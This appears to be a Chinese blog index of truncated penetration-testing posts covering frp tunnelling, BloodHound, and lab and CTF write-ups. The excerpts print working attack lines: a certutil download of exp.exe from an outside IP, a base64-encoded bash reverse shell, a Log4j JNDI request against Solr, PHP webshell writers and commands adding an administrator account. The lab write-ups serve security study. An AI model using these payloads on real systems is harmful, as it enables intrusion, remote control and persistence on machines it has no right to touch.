frp
我们新式的frp已经完全取代了旧版的frp(指舍弃了ini配置)。是我错付了。
来看看新版都有点啥新活。
好好好,这样玩。现在主要是使用TOML文件进行配置。
配置文件校验
frps verify -c ./frps.tomlfrpc verify -c ./frpc.toml可以通过这样的命令来校验配置文件哪里存在问题。
端口转发frps
bindPort = 7000 #现在已经不要写common了,会被识别为ini 以前bind_port全部转为小驼峰写法auth.method = "token" #认证方法,以前只写token就可以。现在可以支持多种认证方式auth.token = "1234!@#$"
frpc
serverAddr = "x.x.x.x"serverPort = 7000auth.method = "token"auth.token = "1234!@#$"[[proxies]] #现在是需要两个方框 下面的一些属性变量也需要注意数据类型name ...
BloodHound
BloodHound安装需要先安装一下neo4j数据库(网上找个教程即可)
管理员权限启动
然后再配合SharpHound
SharpHound -c all #我这里用的版本是1.1.1 2.0.1版本导入一直为0
powershell -exec bypass -command "Import-Module ./SharpHound.ps1; Invoke-BloodHound -c all"
半天不动敲一下回车,最后会生成一个zip包,然后就可以开始分析
Database Info为数据库信息。
Node info是节点信息
Analysis为查询模块
边缘信息边缘就是两个节点之间的连线,可以反映两个相互作用的节点之间的关系。
比如这个MemberOf代表域用户Administrator是用户组Domain Admins的成员
边缘名称
说明
AdminTo
表示该用户是目标计算机上的本地管理员
MemberOf
表示该主体是某用户组的成员
HasSession
表示该用户在某计算机上拥有会话(用户与计算机时进行会话 ...
春秋云镜-Privilege
Web打点任意文件读取
提示1:请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
有一个www.zip文件,然后8080是Jenkins服务
根据提示直接读密码
510235cf43f14e83b88a9f144199655b
jenkins GetShell
CS上马,这里其实可以看看权限如果较高可以直接添加管理员用户进去。
certutil.exe -urlcache -split -f http://118.31.166.161:28888/exp.exe exp.exe #让目标机器下载我们的shell
直接执行shell即可。
net user xiaoqiuxx qwer1234! /addnet localgroup administrators xiaoqiuxx /add#权限较高(system)可以直接添加 ...
春秋云镜-Certify
Web打点
这里可以看到直接扫到了一个solr,然后我们进入直接是可以看到log4j的依赖,然后直接打一下试试。
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.yujrzdhxzy.dgrh3.cn} HTTP/1.1Host: 39.98.113.164:8983Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Connection: close
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 118.31.166.161
GET /solr/admin/cores?action=${jnd ...
春秋云镜-Time
web打点neo4jjava8 -jar rhino_gadget.jar rmi://39.99.131.228:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMzEuMTY2LjE2MS8yODg4OCAwPiYx}|{base64,-d}|{bash,-i}"
tips:
Do you know the authentication process of Kerberos?……This will be the key to your progress.
开启http服务上传fscan和frpc
有一个内网网段
start infoscantrying RunIcmp2The current user permissions unable to send icmp packetsstart ping(icmp) Target 172.22.6.25 is alive(icmp) Target 172.22.6.36 is ...
bugku渗透测试1
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST[123]);?>');?><?phpsystem("echo PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg== | base64 -d >hello.php & ls");# <?php @eval($_POST[1]);?>?>
场景1进来之后发现是这这也一个知识学习网站。我们打开源代码可以获得第一个flag。
场景2姿势1其实这种运行环境都确实可以执行我们运行的命令或者脚本,我们可以在这里尝试运行写入。
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST[123]);?>');?>
姿势2这里后台拿shell才是预期解。因为提示了需要admin,这里弱口令 ...
week6
第六周工具安装这里首先安装一些后续要使用的工具
1、gobuster
这也是一个目录爆破的工具,然后这里kali的话默认不安装,我们直接输入命令会提示是否安装,输入y即可。
2、seclists #这是一个字典大合集,也是输入命令然后选择y安装即可。
默认的安装目录在
/usr/share/seclists/
其中Discovery里面就有web目录的字典Web-Content
可以看到非常多的字典
信息收集不多说。
这里可以发现80端口开启了http服务,那么就可以通过浏览器去进行访问测试。
进来发现只有一个apache的首页,那么就需要进行一个目录的爆破测试了。这里就使用我们上面安装好的工具
gobuster dir -u http://192.168.18.7/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp#这里就是 -u 指定url -w 指定字典 -x 指定要爆破的文件类型
最后我们扫描结果可以发现一个secret目录,然后 ...
week5
第五周工具安装这里我们先安装一下后面需要使用的工具,蚁剑。
Release AntSword v2.1.15 · AntSwordProject/antSword (github.com)
首先下载蚁剑的源代码。
然后下载蚁剑的加载器。
AntSwordProject/AntSword-Loader: AntSword 加载器 (github.com)
传输到KALi虚拟机上。
进入文件夹
执行命令
加载器这里就是去选择蚁剑源码即可。
加载完成之后重新启动会报错,这个时候我们先ctrl + c结束掉。
来到蚁剑的源码目录,执行命令
mv node_modules/mime/mime.js node_modules/mime/Mime.js
然后再回到加载器目录启动。
这个时候就可以成功启动了。
蚁剑这里可以设置中文
信息收集
这里可以看到80端口和8000端口都是存在http服务的,但是8000端口是没有什么可以利用的地方(已测试),我们主要看向80端口。
打开是这么一个页面,这里有登录和注册。这里我们先注册一个用户看看。
注册成功直接 ...
week4
第四周测试思路:1.信息收集 知己知彼,百战百胜。首先发现目标的基本信息,从中发掘出可以利用的漏洞。2.获取shell 进行漏洞测试,尝试获取shell3.后渗透 拿到shell进行提权维权
信息收集1.使用nmap进行主机发现 nmap -sn 192.168.192.0/24 #-sn类似于ping 0/24八位主机号 扫描范围为0-255发现今天的目标 192.168.192.130
扫描存活主机后进行详细的信息收集 使用nmap -sV 192.168.192.130发现目标只开启了80端口 为一个APache的web服务 直接在浏览器内进行查看
打开后发现为apache2的一个默认启动页面 没有发现有效信息 转换思路进行文件扫描测试可以使用dirsearch等工具进行测试 这里使用feroxbuster kali默认没有安装
使用方法也较为简单 参数为--url ip即可进行测试初次使用会进行报错 因为它没有内置的字典 默认字典为seclists 需要进行下载 如果不想安装可以给他指定其他字典feroxbuster --url ip ...
week3
第三周信息收集这里使用一个新工具,原理都是相同的的,都是使用的arp协议。
netdiscover -r 192.168.18.4/24 -i eth1 #-r指定网段, -i指定网卡
这里可以发现到这次需要攻击的靶机192.168.18.6
熟悉的套路,使用nmap两件套
nmap -p- 192.168.18.6nmap -p22,80,8000 -sV 192.168.18.6
这里可以发现80和8000端口都存在一个http服务,而且是由Node.js搭建的后端服务,那么这里直接使用浏览器访问。首先访问80端口,可以发现这么一张图片,跟做CTF题一样的思路,没有发现功能点可以进行目录扫描或者源代码查看。这里先查看一下源代码看看。
这里查看到一段js代码,复制下来再看看。
var _0x5bdf=['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe' ...